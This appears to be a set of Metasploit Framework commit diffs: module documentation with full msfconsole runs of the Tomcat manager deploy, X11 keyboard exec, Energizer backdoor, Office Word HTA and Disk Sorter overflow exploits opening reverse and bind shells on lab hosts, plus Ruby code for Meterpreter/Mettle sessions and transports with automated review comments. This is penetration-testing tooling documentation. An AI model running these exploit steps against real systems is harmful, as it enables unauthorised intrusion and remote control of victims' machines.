[*] Using manually select target "Java Universal"
[*] Uploading 6085 bytes as c6TYmkd8YAe8LqKQhSCr.war ...
[*] Executing /c6TYmkd8YAe8LqKQhSCr/PtW1uMsYCIFP1gs16PUiwE7oc.jsp...
[*] Undeploying c6TYmkd8YAe8LqKQhSCr ...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1196) at 2017-01-14 10:24:52 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
@ -215,7 +215,7 @@ Of note, the user was given `manager-gui` permissions by default.
3. Exploit:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156
rhost => 192.168.2.156
msf exploit(tomcat_mgr_deploy) > set rport 8080
@ -226,15 +226,15 @@ Of note, the user was given `manager-gui` permissions by default.
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
payload => linux/x86/mettle/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set target 3
target => 3
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Linux x86"
[*] Uploading 1545 bytes as 9bj4IYa66cSpdK.war ...
[!] No active DB -- Credential data will not be saved!
@ -243,7 +243,7 @@ Of note, the user was given `manager-gui` permissions by default.
[*] Sending stage (335800 bytes) to 192.168.2.156
[*] Undeploying 9bj4IYa66cSpdK ...
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:40020) at 2017-01-11 21:18:31 -0500
meterpreter > sysinfo
Computer : Ubuntu14.04
OS : Ubuntu 14.04 (Linux 4.2.0-27-generic)
@ -273,15 +273,15 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
3. Exploit:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
rhost => 192.168.2.118
msf exploit(tomcat_mgr_deploy) > set rport 8087
rport => 8087
msf exploit(tomcat_mgr_deploy) > set target 3
target => 3
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
payload => linux/x86/mettle/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
@ -294,8 +294,8 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Linux x86"
[*] Uploading 1579 bytes as 9QymzSGGU0H4e.war ...
[!] No active DB -- Credential data will not be saved!
@ -304,7 +304,7 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (335800 bytes) to 192.168.2.118
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:34294) at 2017-01-08 20:35:24 -0500
meterpreter > sysinfo
Computer : 192.168.2.118
OS : Ubuntu 16.04 (Linux 4.4.0-21-generic)
@ -335,15 +335,15 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
3. Exploit:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118
rhost => 192.168.2.118
msf exploit(tomcat_mgr_deploy) > set rport 8088
rport => 8088
msf exploit(tomcat_mgr_deploy) > set target 3
target => 3
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp
payload => linux/x86/mettle/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
@ -355,8 +355,8 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Linux x86"
[*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ...
[!] No active DB -- Credential data will not be saved!
@ -365,7 +365,7 @@ Of note, as of 7, the permission role 'manager' has been divided into several su
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (335800 bytes) to 192.168.2.118
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500
meterpreter > sysinfo
Computer : 192.168.2.118
OS : Ubuntu 16.04 (Linux 4.4.0-59-generic)


@ -38,8 +38,8 @@ msf exploit(allwinner_backdoor) > set verbose true
verbose => true
msf exploit(allwinner_backdoor) > set session 1
session => 1
msf exploit(allwinner_backdoor) > set payload linux/armle/mettle/reverse_tcp
payload => linux/armle/mettle/reverse_tcp
msf exploit(allwinner_backdoor) > set payload linux/armle/meterpreter/reverse_tcp
payload => linux/armle/meterpreter/reverse_tcp
msf exploit(allwinner_backdoor) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(allwinner_backdoor) > check
@ -50,7 +50,7 @@ msf exploit(allwinner_backdoor) > exploit
## Successful exploitation:
```
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (374540 bytes) to 192.168.2.248
[+] Backdoor Found, writing payload to /tmp/odzVx.elf
@ -68,4 +68,4 @@ Computer : 192.168.2.248
OS : Ubuntu 14.04 (Linux 3.4.39)
Architecture : armv7l
Meterpreter : armle/linux
```
```


@ -0,0 +1,137 @@
## Vulnerable Application
X11 (X Window System) is a graphical windowing system most common on unix/linux.
The service can accept connections from any users when misconfigured which is done with the command `xhost +`.
This exploit has been verified against:
1. Ubuntu 14.04
2. Ubuntu 16.04
3. Kali via Emulation method
This exploit does NOT work against:
1. Solaris 10 Java Desktop System (alt+F2 has no effect)
### Emulation
This can be emulated (on kali) utilizing the following command: `socat -d -d TCP-LISTEN:6000,fork UNIX-CONNECT:/tmp/.X11-unix/X0`
### Ubuntu 12.04, 14.04
1. `sudo nano /etc/lightdm/lightdm.conf`
2. Under the `[SeatDefaults]` area, add:
```
xserver-allow-tcp=true
allow-guest=true
```
3. logout or reboot
4. Verification: ```sudo netstat -antp | grep 6000```
```
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
```
5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
### Ubuntu 16.04
Use the Ubuntu 12.04 instructions, however change `SeatDefaults` to `Seat:*`
## Verification Steps
1. Install and configure X11
2. Start msfconsole
3. Do: `use exploit/unix/x11/x11_keyboard_exec`
4. Do: `set rhost [IPs]`
5. Do: `set payload [payload]`
6. Do: `exploit`
## Scenarios
### Ubuntu 14.04
```
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(x11_keyboard_exec) > run
[*] Started bind handler
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Register keyboard
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening "Run Application"
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds...
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening xterm
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds...
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Typing and executing payload
[*] Command shell session 1 opened (192.168.2.117:44549 -> 192.168.2.75:4444) at 2017-04-23 15:26:56 -0400
id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
NAME="Ubuntu"
VERSION="14.04.5 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.5 LTS"
VERSION_ID="14.04"
```
### Ubuntu 16.04
```
msf exploit(x11_keyboard_exec) > set rhost 192.168.2.26
rhost => 192.168.2.26
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(x11_keyboard_exec) > exploit
[*] Started bind handler
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Register keyboard
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening "Run Application"
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds...
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening xterm
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds...
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Typing and executing payload
[*] Command shell session 2 opened (192.168.2.117:45813 -> 192.168.2.26:4444) at 2017-04-23 15:29:27 -0400
id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.1 LTS"
NAME="Ubuntu"
VERSION="16.04.1 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.1 LTS"
VERSION_ID="16.04"
UBUNTU_CODENAME=xenial
```
### Kali via Emulation
```
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(x11_keyboard_exec) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(x11_keyboard_exec) > run
[*] Started bind handler
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Register keyboard
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening "Run Application"
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds...
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening xterm
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds...
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Typing and executing payload
[*] Command shell session 3 opened (127.0.0.1:37909 -> 127.0.0.1:4444) at 2017-04-23 15:35:26 -0400
```


@ -0,0 +1,36 @@
## Vulnerable Application
More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
## Verification Steps
1. Install the vulnerable software
2. Start msfconsole
3. Do: `use exploit/windows/backdoor/energizer_duo_payload`
4. Do: `set rhost`
5. Do: `set payload`
6. Do: `exploit`
## Scenarios
A run against the backdoor
```
msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228
msf exploit(energizer_duo_payload) > exploit
[*] Started reverse handler on 192.168.0.228:4444
[*] Trying to upload C:\NTL0ZTL4DhVL.exe...
[*] Trying to execute C:\NTL0ZTL4DhVL.exe...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200)
meterpreter > getuid
Server username: XPDEV\Developer
```


@ -0,0 +1,68 @@
Microsoft Office is an office suite of applications, servers, and services developed by Microsoft. Microsoft Office contains Microsoft Word, Microsoft Excel, Microsoft PowerPoint and so on. They can support OLE data integration and Virtusl Basic for Application scripting langauage.
FireEye detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.
The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.
## Vulnerable Application
- Windows Vista Service Pack 2
- Windows Vista x64 Edition Service Pack 2
- Windows 7 for 32-bit Systems Service Pack 1
- Windows 7 for x64-based Systems Service Pack 1
- Windows Server 2008 for 32-bit Systems Service Pack 2
- Windows Server 2008 R2 for x64-based Systems Service Pack 1
- Windows Server 2008 for x64-based Systems Service Pack 2
- Windows Server 2008 for Itanium-Based Systems Service Pack 2
- Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
- Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
- Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
- Windows Server 2012
- Windows Server 2012 (Server Core installation)
- Microsoft Office 2007 Service Pack 3
- Microsoft Office 2013 Service Pack 1 (32-bit editions)
- Microsoft Office 2013 Service Pack 1 (64-bit editions)
- Microsoft Office 2010 Service Pack 2 (32-bit editions)
- Microsoft Office 2010 Service Pack 2 (64-bit editions)
- Microsoft Office 2016 (32-bit edition)
- Microsoft Office 2016 (64-bit edition)
## Verification Steps
1. Start msfconsole
2. Do: ```use exploit/windows/fileformat/office_word_hta```
3. Do: ```set payload [PAYLOAD NAME]```
3. Do: ```exploit```
## Demo
```
$ msfconsole
msf > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(office_word_hta) > set lhost 192.168.146.1
lhost => 192.168.146.1
msf exploit(office_word_hta) > set srvhost 192.168.146.1
srvhost => 192.168.146.1
msf exploit(office_word_hta) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.146.1:4444
[+] msf.doc stored at /Users/wchen/.msf4/local/msf.doc
[*] Using URL: http://192.168.146.1:8080/default.hta
[*] Server started.
```
After you have the malicious doc file and servers ready, copy the doc file onto the victim machine,
and open it with Microsoft Office Word. You should receive a session:
```
[*] Sending stage (957487 bytes) to 192.168.146.145
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2017-04-24 16:00:49 -0500
```


@ -0,0 +1,73 @@
## Vulnerable Application
[Disk Sorter Enterprise](http://www.disksorter.com) versions up to v9.5.12 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [Exploit-DB](https://www.exploit-db.com/apps/5ffae2c1a4b2165e0dd2a8e37765ef0e-disksorterent_setup_v9.5.12.exe).
## Verification Steps
1. Install a vulnerable Disk Sorter Enterprise
2. Start `Disk Sorter Enterprise` service
3. Start `Disk Sorter Enterprise` client application
4. Navigate to `Tools` > `Disk Sorter Options` > `Server`
5. Check `Enable Web Server On Port 80` to start the web interface
6. Start `msfconsole`
7. Do `use exploit/windows/http/disksorter_bof`
8. Do `set RHOST ip`
9. Do `check`
10. Verify the target is vulnerable
11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
12. Do `set LHOST ip`
13. Do `exploit`
14. Verify the Meterpreter session is opened
## Scenarios
###Disk Sorter Enterprise v9.5.12 on Windows 7 SP1
```
msf exploit(disksorter_bof) > show options
Module options (exploit/windows/http/disksorter_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 172.16.0.9 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.0.20 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Disk Sorter Enterprise v9.5.15
msf exploit(disksorter_bof) > exploit
[*] Started reverse TCP handler on 172.16.0.20:4444
[*] Sending request...
[*] Sending stage (957487 bytes) to 172.16.0.9
[*] Meterpreter session 1 opened (172.16.0.20:4444 -> 172.16.0.9:59371) at 2017-04-24 14:46:52 +0100
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : pt_PT
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
```


@ -1,4 +1,4 @@
linux/x86/meterpreter/reverse_tcp is the most pouplar payload against the Linux platform. It allows
linux/x86/meterpreter/reverse_tcp is the most popular payload against the Linux platform. It allows
you to remotely take over the compromised system, having control of the file system, collect
sensitive information such as credentials using post modules, etc.
@ -209,7 +209,7 @@ meterpreter > help
## Using a Post module
One of the best things about Meterprter is you have access to a variety of post modules that
One of the best things about Meterpreter is you have access to a variety of post modules that
"shell" sessions might not have. Post modules provide you with more capabilities to collect data
from the remote machine automatically. For example, stealing credentials from the system or
third-party applications, or modify settings, etc.


@ -0,0 +1,46 @@
A basic fuzzer for CAN IDs. It can scan through CAN IDs and probes each data section
with a set value. The defualt is 0xFF. It can also iterate through all the possible
values for each byte as well. It has no concept of what is going on and makes no
attempt to check for return packets.
## Options
**STARTID**
The CAN ID to start your scan from.
**STOPID**
The CAN ID to stop the CAN scan. If no STOPID is specified it will only scan one ID (STARTID).
**FUZZ**
If true the data segment will iterate through all possiblities (0-255).
**PROBEVALUE**
The value to put at each data segment. The default is 0xFF. When Fuzz is enabled this value is ignored.
**PADDING**
If you need to pad out the packet to be 8 packets for each request you can set this value to something between 0-255.
**CANBUS**
The bus to scan. See 'supported_buses' for a list of available buses.
## Scenarios
To quickly test how a vehicle or ECU reacts to random data throughout the packet. For instance, you
have identified some door controls using a certain CAN ID. By probing the other values you can often identify
other door related functions.
Note: This is not a scanner. You would not want to run this against all the IDs in a car and expect (good) results.
```
hwbridge > run post/hardware/automotive/canprobe CANBUS=can0 STARTID=0x320 fuzz=true
[*] Probing 0x320...
[*] Probe Complete
```


@ -0,0 +1,68 @@
This module allows you to upload a binary file, and automatically execute it.
## Vulnerable Application
The following platforms are supported:
* Windows
* Linux
* OS X
## Verification Steps
1. Prepare for an executable file you wish to upload and execute.
2. Obtain a session from the target machine.
3. In msfconsole, do ```use post/multi/manage/upload_exec```
4. Set the ```LFILE``` option
5. Set the ```RFILE``` option
6. Set the ```SESSION``` option
7. ```run```
## Options
**LFILE**
The file on your machine that you want to upload to the target machine.
**RFILE**
The file path on the target machine. This defaults to LFILE.
## Demo
```
msf > use post/multi/manage/upload_exec
msf post(upload_exec) > show options
Module options (post/multi/manage/upload_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
LFILE yes Local file to upload and execute
RFILE no Name of file on target (default is basename of LFILE)
SESSION yes The session to run this module on.
msf post(upload_exec) > set lfile /tmp/
lfile => /tmp/
msf post(upload_exec) > set lfile /tmp/msg.exe
lfile => /tmp/msg.exe
msf post(upload_exec) > set rfile C:\\Users\\sinn3r\\Desktop\\msg.exe
rfile => C:\Users\sinn3r\Desktop\msg.exe
msf post(upload_exec) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/windows WIN-6NH0Q8CJQVM\sinn3r @ WIN-6NH0Q8CJQVM 192.168.146.1:4444 -> 192.168.146.149:50168 (192.168.146.149)
msf post(upload_exec) > set session 1
session => 1
msf post(upload_exec) > run
[-] Post interrupted by the console user
[*] Post module execution completed
```


@ -30,7 +30,7 @@ module Metasploit
end
end
VERSION = "4.14.15"
VERSION = "4.14.17"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash


@ -10,7 +10,7 @@ module Sessions
# This class creates a platform-specific meterpreter session type
#
###
class Meterpreter_x64_Mettle_Linux < Msf::Sessions::Meterpreter
class Meterpreter_x64_Linux < Msf::Sessions::Meterpreter
def supports_ssl?
false
end


@ -11,6 +11,12 @@ module Sessions
#
###
class Meterpreter_x86_Linux < Msf::Sessions::Meterpreter
def supports_ssl?
false
end
def supports_zlib?
false
end
def initialize(rstream, opts={})
super
self.base_platform = 'linux'
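Review bot: The two new predicates `supports_ssl?` and `supports_zlib?` turn off transport-level TLS and compression for every x86 Linux Meterpreter session, and nothing in the hunk says why, so a later reader cannot tell a limitation from a policy choice. They appear to be carried over from the deleted Meterpreter_x86_Mettle_Linux class elsewhere in this commit, which suggests the Mettle implementation does not provide these transport features — confirm against the payload. A one-line comment above them such as `# Mettle-based Linux sessions do not implement the SSL/zlib transport features; keep both disabled.` would capture the intent. The class definition continues outside the hunk.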


@ -1,29 +0,0 @@
# -*- coding: binary -*-
require 'msf/base/sessions/meterpreter'
module Msf
module Sessions
###
#
# This class creates a platform-specific meterpreter session type
#
###
class Meterpreter_x86_Mettle_Linux < Msf::Sessions::Meterpreter
def supports_ssl?
false
end
def supports_zlib?
false
end
def initialize(rstream, opts={})
super
self.base_platform = 'linux'
self.base_arch = ARCH_X86
end
end
end
end


@ -1,22 +1,75 @@
# -*- coding: binary -*-
require 'msf/core/payload/transport_config'
require 'msf/core/payload/uuid/options'
require 'base64'
module Msf
module Sessions
module MettleConfig
module Sessions
module MettleConfig
include Msf::Payload::TransportConfig
include Msf::Payload::TransportConfig
def generate_config(opts={})
transport = transport_config_reverse_tcp(opts)
opts[:uuid] ||= generate_payload_uuid
opts[:uuid] = Base64.encode64(opts[:uuid].to_raw).strip
opts[:uri] ||= "#{transport[:scheme]}://#{transport[:lhost]}:#{transport[:lport]}"
opts.slice(:uuid, :uri, :debug, :log_file)
def generate_uri(opts={})
ds = opts[:datastore] || datastore
uri_req_len = ds['StagerURILength'].to_i
# Choose a random URI length between 30 and 128 bytes
if uri_req_len == 0
uri_req_len = 30 + luri.length + rand(127 - (30 + luri.length))
end
if uri_req_len < 5
raise ArgumentError, "Minimum StagerURILength is 5"
end
generate_uri_uuid_mode(:init_connect, uri_req_len, uuid: opts[:uuid])
end
def generate_http_uri(opts)
if Rex::Socket.is_ipv6?(opts[:lhost])
target_uri = "#{opts[:scheme]}://[#{opts[:lhost]}]"
else
target_uri = "#{opts[:scheme]}://#{opts[:lhost]}"
end
target_uri << ':'
target_uri << opts[:lport].to_s
target_uri << luri
target_uri << generate_uri(opts)
target_uri
end
def generate_tcp_uri(opts)
if Rex::Socket.is_ipv6?(opts[:lhost])
target_uri = "#{opts[:scheme]}://[#{opts[:lhost]}]"
else
target_uri = "#{opts[:scheme]}://#{opts[:lhost]}"
end
target_uri << ':'
target_uri << opts[:lport].to_s
target_uri
end
def generate_config(opts={})
opts[:uuid] ||= generate_payload_uuid
case opts[:scheme]
when 'http'
transport = transport_config_reverse_http(opts)
opts[:uri] = generate_http_uri(transport)
when 'https'
transport = transport_config_reverse_https(opts)
opts[:uri] = generate_http_uri(transport)
when 'tcp'
transport = transport_config_reverse_tcp(opts)
opts[:uri] = generate_tcp_uri(transport)
else
raise ArgumentError, "Unknown scheme: #{opts[:scheme]}"
end
opts[:uuid] = Base64.encode64(opts[:uuid].to_raw).strip
opts.slice(:uuid, :uri, :debug, :log_file)
end
end
end
end
end
end
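Review bot: `generate_http_uri` and `generate_tcp_uri` duplicate the scheme/host/port assembly, including the IPv6-bracketing branch, so the bracketing rule now lives in two places; extracting it into one helper keeps it in a single spot and lets the HTTP variant read as authority + luri + stager URI. The random-length branch in `generate_uri` also deserves a guard: for a long `luri` the argument to `rand` reaches zero or goes negative, and `Kernel#rand(0)` yields a Float rather than an Integer length — presumably unreachable with usual LURI values, but cheap to clamp with a minimum. The extraction below is behaviour-preserving and leaves `generate_uri` and `generate_config` as they are.
```ruby
# Builds "scheme://host:port", bracketing IPv6 literals so they parse as a URI authority.
def uri_authority(opts)
  host = Rex::Socket.is_ipv6?(opts[:lhost]) ? "[#{opts[:lhost]}]" : opts[:lhost]
  "#{opts[:scheme]}://#{host}:#{opts[:lport]}"
end

def generate_http_uri(opts)
  uri_authority(opts) + luri + generate_uri(opts)
end

def generate_tcp_uri(opts)
  uri_authority(opts)
end

# … unchanged: generate_uri, generate_config …
```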


@ -194,6 +194,8 @@ module Exploit::Remote::SMTPDeliver
full_msg << date unless data =~ /date: /i
full_msg << subject unless subject.nil? || data =~ /subject: /i
full_msg << data
# Escape leading dots in the mail messages so there are no false EOF
full_msg.gsub!(/(?m)^\./, '..')
send_status = raw_send_recv("#{full_msg}\r\n.\r\n", nsock)
end
else
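Review bot: The `(?m)` flag in the added `gsub!` is misleading: in Ruby, `m` makes `.` match newlines (what other engines call `s`), while `^` is always a line anchor, so the flag has no effect on `^\.`. `full_msg.gsub!(/^\./, '..')` is equivalent and avoids the impression that anchors needed enabling. The dot-stuffing itself is correct for the DATA phase and is applied to the whole message, headers included, which is what the protocol expects. The enclosing method starts and ends outside the hunk.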


@ -45,7 +45,7 @@ module ReverseHttp
register_options(
[
OptString.new('LHOST', [true, 'The local listener hostname']),
OptAddressLocal.new('LHOST', [true, 'The local listener hostname']),
OptPort.new('LPORT', [true, 'The local listener port', 8080]),
OptString.new('LURI', [false, 'The HTTP Path', ''])
], Msf::Handler::ReverseHttp)
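Review bot: LHOST is re-typed from OptString to OptAddressLocal but its description still reads "The local listener hostname"; the new type accepts an address or a local interface name and presumably applies OptAddress validation rather than accepting any string (verify against OptAddress#valid?), so the help text no longer describes what is accepted and a value that used to pass as a plain string may now be rejected. Update the line to `OptAddressLocal.new('LHOST', [true, 'The local listener address or interface name']),`; the same applies to the LHOST option in the ReverseHttpsProxy hunk. The enclosing method begins outside the hunk.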


@ -38,7 +38,7 @@ module ReverseHttpsProxy
register_options(
[
OptString.new('LHOST', [ true, "The local listener hostname" ,"127.0.0.1"]),
OptAddressLocal.new('LHOST', [ true, "The local listener hostname" ,"127.0.0.1"]),
OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
OptString.new('PayloadProxyHost', [true, "The proxy server's IP address", "127.0.0.1"]),
OptPort.new('PayloadProxyPort', [true, "The proxy port to connect to", 8080 ]),


@ -0,0 +1,23 @@
module Msf::Module::External
def wait_status(mod)
while mod.running
m = mod.get_status
if m
case m['level']
when 'error'
print_error m['message']
when 'warning'
print_warning m['message']
when 'good'
print_good m['message']
when 'info'
print_status m['message']
when 'debug'
vprint_status m['message']
else
print_status m['message']
end
end
end
end
end
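Review bot: `wait_status` carries no documentation, and its `when 'info'` arm is identical to the `else` arm, so the `'info'` arm can be dropped and the `else` branch left to handle both the known default and any unexpected level. A header such as `# Drain status messages from an external module until it stops running, routing each message to the console printer matching its 'level'.` would tell a reader what the loop is for. If `mod.get_status` can return nil without blocking while `mod.running` stays true, this loop spins at full speed; the Bridge implementation is outside this hunk, so confirm it blocks or add a short sleep on the nil path.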


@ -7,6 +7,10 @@ class Msf::Modules::External::Bridge
attr_reader :path, :running
def self.applies?(module_name)
File::executable? module_name
end
def meta
@meta ||= describe
end
@ -34,6 +38,7 @@ class Msf::Modules::External::Bridge
end
def initialize(module_path)
self.env = {}
self.running = false
self.path = module_path
end
@ -41,7 +46,7 @@ class Msf::Modules::External::Bridge
protected
attr_writer :path, :running
attr_accessor :ios
attr_accessor :env, :ios
def describe
resp = send_receive(Msf::Modules::External::Message.new(:describe))
@ -57,7 +62,7 @@ class Msf::Modules::External::Bridge
end
def send(message)
input, output, status = ::Open3.popen3([self.path, self.path])
input, output, status = ::Open3.popen3(env, [self.path, self.path])
self.ios = [input, output, status]
case Rex::ThreadSafe.select(nil, [input], nil, 0.1)
when nil
@ -98,3 +103,31 @@ class Msf::Modules::External::Bridge
[input, output].each {|fd| fd.close rescue nil} # Yeah, yeah. I know.
end
end
class Msf::Modules::External::PyBridge < Msf::Modules::External::Bridge
def self.applies?(module_name)
module_name.match? /\.py$/
end
def initialize(module_path)
super
pythonpath = ENV['PYTHONPATH'] || ''
self.env = self.env.merge({ 'PYTHONPATH' => pythonpath + File::PATH_SEPARATOR + File.expand_path('../python', __FILE__) })
end
end
class Msf::Modules::External::Bridge
LOADERS = [
Msf::Modules::External::PyBridge,
Msf::Modules::External::Bridge
]
def self.open(module_path)
LOADERS.each do |klass|
return klass.new module_path if klass.applies? module_path
end
nil
end
end
